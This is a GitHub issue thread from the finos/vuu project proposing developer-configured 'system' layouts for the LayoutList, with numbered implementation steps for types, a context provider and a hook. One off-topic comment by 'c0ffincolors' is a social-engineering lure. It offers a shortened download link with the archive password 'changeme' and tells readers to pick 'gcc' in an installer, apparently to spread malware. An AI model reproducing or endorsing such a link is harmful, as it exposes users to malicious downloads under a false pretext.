### ISSUE TITLE
Allow app to be configured with Layouts that will be used to populate Layout Selection Panel 

### ISSUE THREAD

**Issue by heswell** [finos/vuu#1469]
Currently, users can save a layout from the Layout Tab menu. Saved layouts are listed in the LayoutList (exactly where this is rendered will differ from app to app) and user can click an entry in this list to load that layout into the workspace.

First time experience right now is that LayoutList is initially empty and only shows content after user has explicitly saved one or more layouts.  

New feature is to allow application developer to pre-configure the app with one or more layouts, which will appear in the LayoutList. These could be considered `static` layouts or `system` layouts, as opposed to the layouts saved by the user.
They will always be present and the user will not be allowed to delete them. If the user saves one or more Layouts, these will be shown in the LayoutList together with the `system` Layouts. 

We already group layouts in the List (the user can specify a group label). We shoudl display `system` layouts before user layouts and label them.

The list of saved User layouts is loaded from persistent storage by the persistenceManager. The list is actually a list of `LayoutMetaData` entities. These provide a label, group, description and a few other pieces of metadata, but do not include the actual JSON that defines the layout. Rather, they include an `id`, this `id` is used to load the layout from persistent storage when user clicks to load a layout.

The `system` layouts will be provided via a different mechanism.

We will define an extended variant of the `LayoutMetadata` structure that will add a `layoutJson` property. This will be the JSON structure that defines the layout. We have an existing `Provider` that allows `Feature`s to be injected into the app. We can extend the functionality of this Provider to also allow Layouts to be injected.

Dev steps:
1) Create a new type `SystemLayoutMetaData` that extends `LayoutMetaData`, but adds `layoutJSON`.
2) Rename `FeatureProvider` to either `FeatureAndLayoutProvider` or `ContentProvider` (or a better name if you can think of one)
3) add `systemLayouts` as a prop to this provider, and store them in the Context object
4) add a new custom hook `useSystemLayouts` that will work in a similar way to the existing `useFeatures`
5) update LayoutList to read systemLayouts from context using this hook
6) render the system layouts inh the LayoutList
7) when user clicks a system layout from the list, handling will be different from a user-saved layout. Rather than using id to load the layout, the layout itself will be availabale in the layoutJson property.  Will add detail here about how to use this to actually open a new tab with this layout
8) create a Showcase example. A simple example can just wrap the LayoutList with a `ContentProvider` into which some layouts are inkjected. A more full features example can combine the LayoutList with a workspace to show layouts actually being opened

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by heswell** [comment]
implemented
